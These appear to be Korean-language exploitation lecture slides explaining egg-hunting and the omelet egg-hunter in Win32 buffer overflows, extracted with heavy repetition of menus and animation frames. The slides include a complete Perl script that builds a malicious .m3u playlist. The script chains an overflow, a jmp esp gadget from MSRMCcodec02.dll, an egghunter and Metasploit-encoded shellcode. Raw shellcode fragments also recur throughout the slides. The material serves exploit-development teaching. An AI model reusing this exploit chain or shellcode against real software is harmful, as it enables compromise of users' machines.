"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Exercise Time :DExploit Info

.m3u Playlist File Format

length of junk data is 26039

gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll)

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Exercise Time :DExploit Code (EggHuntingExploit.pl)

my $file= "EggHuntingExploit.m3u";

my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll

my $padding = "\x90" x 25; my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". "\x77\x30\x30\x74". # this is the marker/tag: w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = $padding . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";

open($FILE,">$file"); print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode; close($FILE); print "m3u File Created successfully\n";

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

What is the Omelet-Egg-Hunter ?쉘코드 단편화 기술(shellcode fragmentation technique)

Skylined(Berend-Jan Wever)에 의해 소개됨 (http://code.google.com/p/w32-seh-omelet-shellcode/)

공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용

기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재

최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그)

최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음)

일반적인 에그 헌터보다 크기가 더 크다(about 90bytes)

Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

오리지널 쉘 코드 단편화 구성

Length of the Egg

Index Number

3bytes Marker

Fragmented ShellCode (1/n , 2/n, 3/n … n/n)

Omelet-Egg-Hunter 코드

메모리 검색 (search through memory)

모든 에그 찾기(look for all egg)

단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack)

조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original ShellcodeFragmented Shellcode 2/3

Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original ShellcodeFragmented Shellcode 2/3

Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

Search though memory

!

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original ShellcodeFragmented Shellcode 2/3

Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

"

Find Marker

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original ShellcodeFragmented Shellcode 2/3

Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

#

Check length/index

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

#

reproduces the original shellcode at the bottom of the stack

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

Search though memory

$

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

%

Find Marker

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

&

Check length/index

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

&

reproduces the original shellcode at the bottom of the stack

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

Search though memory

'

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

(

Find Marker

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

)

Check length/index

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c

Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

)

reproduces the original shellcode at the bottom of the stack

Omelet-Egg-Hunter Code메모리 검색 Marker 찾기

단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행

How to work Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30

Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c

Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41

🔟

jumps to the reproduced shellcode and executes it

How to made Omelet-Egg-Hunter ?Track3. Exploitation

